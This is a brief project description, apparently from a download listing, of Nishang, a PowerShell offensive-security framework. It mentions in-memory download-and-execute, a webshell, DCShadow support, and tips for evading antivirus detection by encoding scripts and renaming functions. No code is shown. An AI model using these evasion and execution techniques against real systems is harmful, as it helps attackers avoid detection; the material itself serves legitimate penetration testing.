Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security, penetration testing and red teaming. Nishang is useful during all phases of penetration testing. Import all the scripts in the current PowerShell session (PowerShell v3 onwards). Use the individual scripts with dot sourcing. Note that the help is available for the function loaded after running the script and not the script itself since version 0.3.8. In all cases, the function name is same as the script name. Nishang scripts are flagged by many Anti Viruses as malicious. The scrripts on a target are meant to be used in memory which is very easy to do with PowerShell. Two basic methods to execute PowerShell scripts in memory. Use the in-memory dowload and execute: Use below command to execute a PowerShell script from a remote shell, meterpreter native shell, a web shell etc. and the function exported by it.
Features
- All the scripts in Nishang export a function with same name in the current PowerShell session
- Use the -encodedcommand (or -e) parameter of PowerShell All the scripts in Nishang export a function with same name in the current PowerShell session
- Encode the scrript using Invoke-Encode from Nishang
- If the scripts still get detected changing the function and parameter names and removing the help content will help
- Modify AD objects to provide minimal permissions required for DCShadow
- Execute PowerShell scripts in memory, run commands, and download and upload files using this webshell
Project Samples
